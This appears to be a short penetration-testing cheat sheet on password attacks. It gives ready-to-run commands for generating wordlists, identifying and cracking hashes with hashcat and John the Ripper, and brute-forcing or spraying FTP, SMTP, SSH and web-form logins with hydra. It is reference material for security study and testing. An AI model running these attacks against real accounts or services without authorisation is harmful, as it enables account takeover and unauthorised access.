Passwords

Profiling

Default Passwords

There are a few sites that have collected default passwords for various devices:

Weak Passwords

Creating Wordlists

cewl -w list.txt -d 5 -m 5 http://example.com

Username_Generator
Keyspace Technique

```
man crunch
```

Common User Password Profiler

Cracking

Identify

```
hash-identifier <hash>
```
```
hashid <hash>
```

Dictionary

hashcat -a 0 -m 0 f806fc5a2a0d5ba2471600758452799c /usr/share/wordlists/rockyou.txt

john --wordlist=/usr/share/seclists/Passwords/Leaked-Database/rockyou.txt hash.txt

Brute-Force

hashcat -a 3 -m 0 05A5CF06982BA7892ED2A6D38FE832D6 ?d?d?d?d

```
john --incremental=digits hash.txt
```

Rules

#List Rules
cat /etc/john/john.conf|grep "List.Rules:" | cut -d"." -f3 | cut -d":" -f2 | cut -d"]" -f1 | awk NF

john --wordlist=/usr/share/wordlist.txt --rules=best64

Custom rules can be added at the end of john.conf:

[List.Rules:MyRule] 
Az"[0-9][0-9]" ^[!@#$]

Spraying

Technically these are just dictionary but spraying is the same but with the -L list.txt -p pass instead of -l user -P list.txt

#FTP
hydra -l ftp -P passlist.txt ftp://x.x.x.x

#SMTP
hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://x.x.x.x -v 

#SSH
hydra -L users.lst -P /path/to/wordlist.txt ssh://x.x.x.x -v

#HTTP GET
hydra -l admin -P pass.txt x.x.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f 

#HTTP POST
hydra -l admin -P pass.txt x.x.x.x http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

Neko

Password Attacks